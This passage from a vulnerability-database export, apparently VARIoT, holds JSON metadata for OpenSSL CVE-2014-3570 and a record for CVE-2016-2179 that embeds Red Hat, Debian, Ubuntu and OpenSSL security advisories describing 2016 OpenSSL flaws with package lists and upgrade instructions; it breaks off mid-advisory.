"http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/patch/home" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightupdates" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744" }, { "trust": 0.1, "url": "http://www.hp.com/go/smh" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3570" }, { "db": "BID", "id": "71939" }, { "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131359" }, { "db": "PACKETSTORM", "id": "129973" }, { "db": "PACKETSTORM", "id": "131471" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "CNNVD", "id": "CNNVD-201501-160" }, { "db": "NVD", "id": "CVE-2014-3570" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3570" }, { "db": "BID", "id": "71939" }, { "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131359" }, { "db": "PACKETSTORM", "id": "129973" }, { "db": "PACKETSTORM", "id": "131471" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "CNNVD", "id": "CNNVD-201501-160" }, { "db": "NVD", "id": "CVE-2014-3570" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-01-09T00:00:00", "db": "VULMON", "id": "CVE-2014-3570" }, { "date": "2015-01-08T00:00:00", "db": "BID", "id": "71939" }, { "date": "2015-01-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "date": "2015-08-26T01:33:25", "db": "PACKETSTORM", "id": "133318" }, { "date": "2015-04-09T16:30:50", "db": "PACKETSTORM", "id": "131359" }, { "date": "2015-01-15T16:53:07", "db": "PACKETSTORM", "id": "129973" }, { "date": "2015-04-17T06:44:37", "db": "PACKETSTORM", "id": "131471" }, { "date": "2015-08-26T01:33:07", "db": "PACKETSTORM", "id": "133316" }, { "date": "2015-03-24T17:05:09", "db": "PACKETSTORM", "id": "130987" }, { "date": "2015-04-14T18:54:44", "db": "PACKETSTORM", "id": "131408" }, { "date": "2015-08-26T01:35:08", "db": "PACKETSTORM", "id": "133325" }, { "date": "2015-07-21T13:37:51", "db": "PACKETSTORM", "id": "132763" }, { "date": "2015-01-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201501-160" }, { "date": "2015-01-09T02:59:00.053000", "db": "NVD", "id": "CVE-2014-3570" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-15T00:00:00", "db": "VULMON", "id": "CVE-2014-3570" }, { "date": "2017-01-23T00:09:00", "db": "BID", "id": "71939" }, { "date": "2016-08-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201501-160" }, { "date": "2017-11-15T02:29:05.220000", "db": "NVD", "id": "CVE-2014-3570" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "131471" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "CNNVD", "id": "CNNVD-201501-160" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of BN_sqr Vulnerability that breaks cryptographic protection mechanisms", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007551" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "encryption problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201501-160" } ], "trust": 0.6 } }
var-201609-0031
Vulnerability from variot
The DTLS implementation in OpenSSL before 1.1.0 does not properly restrict the lifetime of queue entries associated with unused out-of-order messages, which allows remote attackers to cause a denial of service (memory consumption) by maintaining many crafted DTLS sessions simultaneously, related to d1_lib.c, statem_dtls.c, statem_lib.c, and statem_srvr.c. OpenSSL is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to cause a denial-of-service condition. Versions prior to OpenSSL 1.1.0 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. An attacker could possibly cause an application using OpenSSL to crash if it printed time stamp data from the attacker. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes. OpenSSL Security Advisory [22 Sep 2016] ========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
Severity: High
A malicious client can send an excessively large OCSP Status Request extension. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. This will eventually lead to a Denial Of Service attack through memory exhaustion. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
